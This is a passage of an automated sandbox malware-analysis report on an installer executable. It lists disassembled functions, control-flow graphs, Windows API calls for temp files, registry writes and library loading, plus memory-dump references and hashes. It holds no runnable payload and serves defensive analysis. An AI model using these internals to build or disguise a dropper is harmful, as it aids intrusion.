                                                                                                                                                                                                           • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                           • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\Tilbjelig\diagonallsende\Timebudgetter114\Davening\Udmeldes$C:\Users\user\AppData\Local\Temp\nsi19C1.tmp$C:\Users\user\AppData\Local\Temp\nsi19C1.tmp\System.dll$Call
                                                                                                                                                                                                          • API String ID: 1941528284-2535037376
                                                                                                                                                                                                          • Opcode ID: 1c292b98166a31c9089d75ffbac55774b0fa1de423b16314c0e4ed2c7239b5d3
                                                                                                                                                                                                          • Instruction ID: fa226e2697354f8a36450ecb7523776f7f82d9f29d3b914395726c71c929f9d2
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c292b98166a31c9089d75ffbac55774b0fa1de423b16314c0e4ed2c7239b5d3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37418471900514BADF11BBB5CC46EAF7679EF45328F20823BF522B10E1DB3C8A519A6D
                                                                                                                                                                                                          Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 691 403027-40303e 692 403040 691->692 693 403047-403050 691->693 692->693 694 403052 693->694 695 403059-40305e 693->695 694->695 696 403060-403069 call 403258 695->696 697 40306e-40307b call 403242 695->697 696->697 701 403230 697->701 702 403081-403085 697->702 703 403232-403233 701->703 704 4031db-4031dd 702->704 705 40308b-4030d4 GetTickCount 702->705 706 40323b-40323f 703->706 709 40321d-403220 704->709 710 4031df-4031e2 704->710 707 403238 705->707 708 4030da-4030e2 705->708 707->706 711 4030e4 708->711 712 4030e7-4030f5 call 403242 708->712 713 403222 709->713 714 403225-40322e call 403242 709->714 710->707 715 4031e4 710->715 711->712 712->701 724 4030fb-403104 712->724 713->714 714->701 725 403235 714->725 716 4031e7-4031ed 715->716 719 4031f1-4031ff call 403242 716->719 720 4031ef 716->720 719->701 728 403201-40320d call 405cd7 719->728 720->719 727 40310a-40312a call 406549 724->727 725->707 733 403130-403143 GetTickCount 727->733 734 4031d3-4031d5 727->734 735 4031d7-4031d9 728->735 736 40320f-403219 728->736 737 403145-40314d 733->737 738 40318e-403190 733->738 734->703 735->703 736->716 741 40321b 736->741 742 403155-40318b MulDiv wsprintfW call 4051af 737->742 743 40314f-403153 737->743 739 403192-403196 738->739 740 4031c7-4031cb 738->740 744 403198-40319f call 405cd7 739->744 745 4031ad-4031b8 739->745 740->708 746 4031d1 740->746 741->707 742->738 743->738 743->742 751 4031a4-4031a6 744->751 749 4031bb-4031bf 745->749 746->707 749->727 752 4031c5 749->752 751->735 753 4031a8-4031ab 751->753 752->707 753->749
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CountTick$wsprintf
• String ID: ... %d%%$@
• API String ID: 551687249-3859443358
• Opcode ID: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
• Instruction ID: a151fef9e86e41fc3429002d146a23742bf049d8b35666da4da471479faf367b
• Opcode Fuzzy Hash: c7497415bb8dac91a47c0922d01840e0ec24c5b3dd3d0398628956ac72cbd470
• Instruction Fuzzy Hash: F9517C71901219EBDB10CF65DA44BAE3BA8AF05766F10417BF815B72C0C7789A41CBAA
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 754 4025e5-4025fa call 402ba2 757 402600-402607 754->757 758 402a4c-402a4f 754->758 759 402609 757->759 760 40260c-40260f 757->760 761 402a55-402a5b 758->761 759->760 762 402773-40277b 760->762 763 402615-402624 call 405fb0 760->763 762->758 763->762 767 40262a 763->767 768 402630-402634 767->768 769 4026c9-4026cc 768->769 770 40263a-402655 ReadFile 768->770 772 4026e4-4026f4 call 405ca8 769->772 773 4026ce-4026d1 769->773 770->762 771 40265b-402660 770->771 771->762 774 402666-402674 771->774 772->762 781 4026f6 772->781 773->772 775 4026d3-4026de call 405d06 773->775 777 40267a-40268c MultiByteToWideChar 774->777 778 40272f-40273b call 405f97 774->778 775->762 775->772 777->781 782 40268e-402691 777->782 778->761 785 4026f9-4026fc 781->785 786 402693-40269e 782->786 785->778 788 4026fe-402703 785->788 786->785 789 4026a0-4026c5 SetFilePointer MultiByteToWideChar 786->789 790 402740-402744 788->790 791 402705-40270a 788->791 789->786 792 4026c7 789->792 794 402761-40276d SetFilePointer 790->794 795 402746-40274a 790->795 791->790 793 40270c-40271f 791->793 792->781 793->762 796 402721-402727 793->796 794->762 797 402752-40275f 795->797 798 40274c-402750 795->798 796->768 799 40272d 796->799 797->762 798->794 798->797 799->762
APIs
• ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
• MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402688
• SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004026AB
• MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004026C1
  • Part of subcall function 00405D06: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405D1C
• SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040276D
Strings
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: File$Pointer$ByteCharMultiWide$Read
• String ID: 9
• API String ID: 163830602-2366072709
• Opcode ID: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
• Instruction ID: c1a49ad6acc88ab736a24109aaa050e218125fd0ad183605519c9d8fb0938606
• Opcode Fuzzy Hash: c65befc1453d79e0c2e8f89943b80396fddc1db08f78317adda9697148674731
• Instruction Fuzzy Hash: EC510874D00219AADF209F94CA88AAEB779FF04344F50447BE501F72D0D7B99982DB69
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 800 40567e-4056c9 CreateDirectoryW 801 4056cb-4056cd 800->801 802 4056cf-4056dc GetLastError 800->802 803 4056f6-4056f8 801->803 802->803 804 4056de-4056f2 SetFileSecurityW 802->804 804->801 805 4056f4 GetLastError 804->805 805->803
APIs
• CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
• GetLastError.KERNEL32 ref: 004056D5
• SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EA
• GetLastError.KERNEL32 ref: 004056F4
Strings
• C:\Users\user\AppData\Local\Temp\, xrefs: 004056A4
• C:\Users\user\Desktop, xrefs: 0040567E
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: ErrorLast$CreateDirectoryFileSecurity
• String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
• API String ID: 3449924974-26219170
                                                                                                                                                                                                          • Opcode ID: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                                                                          • Instruction ID: dfae01ed47dc7750d2476d71b6e364c3d252909874df994a371284b211a748b1
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00ef7c6a0f32c1044080c086edeac3c819c61aa9b54d8d974478d91d60ac005e
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18011A71D10619DADF009FA0CA447EFBFB8EF14304F00443AD549B6190E7799608CFA9
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 806 4063ba-4063da GetSystemDirectoryW 807 4063dc 806->807 808 4063de-4063e0 806->808 807->808 809 4063f1-4063f3 808->809 810 4063e2-4063eb 808->810 812 4063f4-406427 wsprintfW LoadLibraryExW 809->812 810->809 811 4063ed-4063ef 810->811 811->812
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D1
                                                                                                                                                                                                          • wsprintfW.USER32 ref: 0040640C
                                                                                                                                                                                                          • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406420
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                                                                                                          • String ID: %s%S.dll$UXTHEME$\
                                                                                                                                                                                                          • API String ID: 2200240437-1946221925
                                                                                                                                                                                                          • Opcode ID: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                                                                          • Instruction ID: 7b807a610878b0bc4ee9c08e82fc2c2c0a074289e2a27b7b834fb84ffe8ff7bb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9cd176900e46196ffcfca9c6351026e8055dbc09b9427d0f5483d49a535bfda6
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 09F0F670500219A7DB10AB68ED0DF9B3A6CEB00304F50443AA946F10D1EBB8DA29CBE8
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 813 10001759-10001795 CloseHandle call 10001b18 816 100018a6-100018a8 813->816 817 1000179b-1000179f 813->817 818 100017a1-100017a7 call 10002286 817->818 819 100017a8-100017b5 call 100022d0 817->819 818->819 824 100017e5-100017ec 819->824 825 100017b7-100017bc 819->825 826 1000180c-10001810 824->826 827 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 824->827 828 100017d7-100017da 825->828 829 100017be-100017bf 825->829 830 10001812-1000184c call 100015b4 call 100024a9 826->830 831 1000184e-10001854 call 100024a9 826->831 853 10001855-10001859 827->853 828->824 832 100017dc-100017dd call 10002b5f 828->832 834 100017c1-100017c2 829->834 835 100017c7-100017c8 call 100028a4 829->835 830->853 831->853 846 100017e2 832->846 841 100017c4-100017c5 834->841 842 100017cf-100017d5 call 10002645 834->842 843 100017cd 835->843 841->824 841->835 852 100017e4 842->852 843->846 846->852 852->824 856 10001896-1000189d 853->856 857 1000185b-10001869 call 1000246c 853->857 856->816 859 1000189f-100018a0 GlobalFree 856->859 862 10001881-10001888 857->862 863 1000186b-1000186e 857->863 859->816 862->856 865 1000188a-10001895 call 1000153d 862->865 863->862 864 10001870-10001878 863->864 864->862 866 1000187a-1000187b FreeLibrary 864->866 865->856 866->862
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • CloseHandle.KERNELBASE(100015B1), ref: 10001786
                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12055918566.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055888328.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055950186.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12055980900.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_10000000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID: Global$Free$Alloc$CloseHandleLibrarylstrcpy
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID: 3864083275-3916222277
                                                                                                                                                                                                          • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                          control_flow_graph 869 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 876 4023c7-4023cf 869->876 877 402a4c-402a5b 869->877 878 4023d1-4023de call 402bbf lstrlenW 876->878 879 4023e2-4023e5 876->879 878->879 882 4023f5-4023f8 879->882 883 4023e7-4023f4 call 402ba2 879->883 887 402409-40241d RegSetValueExW 882->887 888 4023fa-402404 call 403027 882->888 883->882 891 402422-4024fc RegCloseKey 887->891 892 40241f 887->892 888->887 891->877 894 40281e-402825 891->894 892->891 894->877
                                                                                                                                                                                                          APIs
                                                                                                                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsi19C1.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                                                                                                          Strings
                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          • Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
                                                                                                                                                                                                          Similarity
• API ID: CloseCreateValuelstrlen
• String ID: C:\Users\user\AppData\Local\Temp\nsi19C1.tmp
• API String ID: 1356686001-3943782838
• Opcode ID: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
• Instruction ID: 52a733b9c8e4ab95676b633cdda8f3d85a752b7ae8d5fcc25206d9d14f9091af
• Opcode Fuzzy Hash: 1524d7add36cd9fcde37d92f9eca7493f501d411afb00e955b7e8f2a6300b093
• Instruction Fuzzy Hash: A4118E71A00108BFEB11AFA5DE89DAE777DEB44358F11403AF904B61D1DBB85E409668
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (rendered image; node list recovered from the page, legend: Executed / Not Executed)

• 895: 405c54-405c60 -> 896
• 896: 405c61-405c95 (GetTickCount, GetTempFileNameW) -> 897, 898
• 897: 405ca4-405ca6 -> 900
• 898: 405c97-405c99 -> 896, 899
• 899: 405c9b -> 900
• 900: 405c9e-405ca1
APIs
• GetTickCount.KERNEL32 ref: 00405C72
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\SMGS-RCDU5010031.exe",0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034C8), ref: 00405C8D
Strings
• "C:\Users\user\Desktop\SMGS-RCDU5010031.exe", xrefs: 00405C54
• C:\Users\user\AppData\Local\Temp\, xrefs: 00405C59
• nsa, xrefs: 00405C61
Memory Dump Source
• Source File: 00000000.00000002.12042660073.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.12042607808.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042717841.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000422000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000437000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12042772552.0000000000453000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.12043166274.0000000000457000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_SMGS-RCDU5010031.jbxd
Similarity
• API ID: CountFileNameTempTick
• String ID: "C:\Users\user\Desktop\SMGS-RCDU5010031.exe"$C:\Users\user\AppData\Local\Temp\$nsa
• API String ID: 1716503409-2453024286
• Opcode ID: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
• Instruction ID: 1b208e64e042baf7dbd80c3cabdcb34a7d602449cab37475291322263c582f77
• Opcode Fuzzy Hash: da3add3990966c57ea49aa46ced784fea404a948837784a5301244cb17f573d8
• Instruction Fuzzy Hash: 7CF09076700708BFEB00DF59DD49A9BBBBCEB91710F10403AF940E7180E6B49A548B64
Uniqueness

Uniqueness Score: -1.00%

APIs
• GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00401FEE
  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051E7
  • Part of subcall function 004051AF: lstrlenW.KERNEL32(0040318B,0042C228,00000000,0041C400,75BA23A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051F7
  • Part of subcall function 004051AF: lstrcatW.KERNEL32(0042C228,0040318B), ref: 0040520A
  • Part of subcall function 004051AF: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040521C
  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405242
  • Part of subcall function 004051AF: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040525C
  • Part of subcall function 004051AF: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526A
• LoadLibraryExW.KERNELBASE(00000000,?,00000008,?,000000F0), ref: 00401FFF
• FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,?,000000F0), ref: 0040207C
Strings
Similarity
• API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
• String ID: `OC
• API String ID: 334405425-799166930
• Opcode ID: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
• Instruction ID: b14b73648b0fa08bf6b9a57eaf8eef0284e6afbfa2af330353af538dc438c051
• Opcode Fuzzy Hash: a5cae62df9271cba6e0a8105ee2c23d5e565d39ed8c01c1b40d5559beb439337
• Instruction Fuzzy Hash: E0218431900219EBDF20AFA5CE49A9E7E71AF04358F20427FF511B51E1CBBD8A81DA5D
Uniqueness

Uniqueness Score: -1.00%

APIs
• RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F47
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F68
• RegCloseKey.ADVAPI32(?,?,00406190,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405F8B
Strings
Similarity
• API ID: CloseOpenQueryValue
• String ID: Call
• API String ID: 3677997916-1824292864
• Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
• Instruction ID: d8616479382e01d2a6f444a134d683a656a2531fa4940cd32d1faed75845c594
• Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
• Instruction Fuzzy Hash: C701483110060AAFCB218F66ED08EAB3BA8EF44350F00403AFD44D2220D734D964CBA5
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00405AAF: CharNextW.USER32(?,?,0042FA50,?,00405B23,0042FA50,0042FA50,75BA3420,?,C:\Users\user\AppData\Local\Temp\,00405861,?,75BA3420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405ABD
  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405AC2
  • Part of subcall function 00405AAF: CharNextW.USER32(00000000), ref: 00405ADA
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 00401612
  • Part of subcall function 0040567E: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 004056C1
